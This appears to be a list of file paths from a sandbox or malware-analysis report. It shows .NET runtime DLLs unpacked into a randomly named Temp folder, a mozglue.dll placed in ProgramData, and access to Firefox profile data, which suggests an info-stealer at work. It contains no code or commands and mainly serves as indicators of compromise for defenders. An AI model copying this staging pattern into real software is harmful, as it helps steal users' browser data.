C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Text.Encoding.Extensions.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.Tasks.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ObjectModel.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\UIAutomationTypes.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\wpfgfx_cor3.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\D3DCompiler_47_cor3.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Concurrent.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.WebHeaderCollection.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Text.RegularExpressions.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.ServicePoint.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Cryptography.X509Certificates.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Http.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Tracing.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Drawing.Primitives.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.Aero2.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Principal.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Primitives.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Requests.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.ThreadPool.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Windows.Extensions.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.TypeConverter.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.TraceSource.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Resources.ResourceManager.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Cryptography.Algorithms.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Memory.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.WebClient.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.FileSystem.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.Xml.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Configuration.ConfigurationManager.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Process.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.Primitives.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Specialized.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Registry.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.NonGeneric.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Primitives.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Debug.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.CompilerServices.VisualC.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.InteropServices.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.Extensions.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\DirectWriteForwarder.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationCore.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\netstandard.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.Packaging.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\WindowsBase.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.dll
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jw120ick.m0f.ps1
C:\ProgramData\mozglue.dll
C:\ProgramData\GDBFHDHJKKJDHJJJJKEG
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms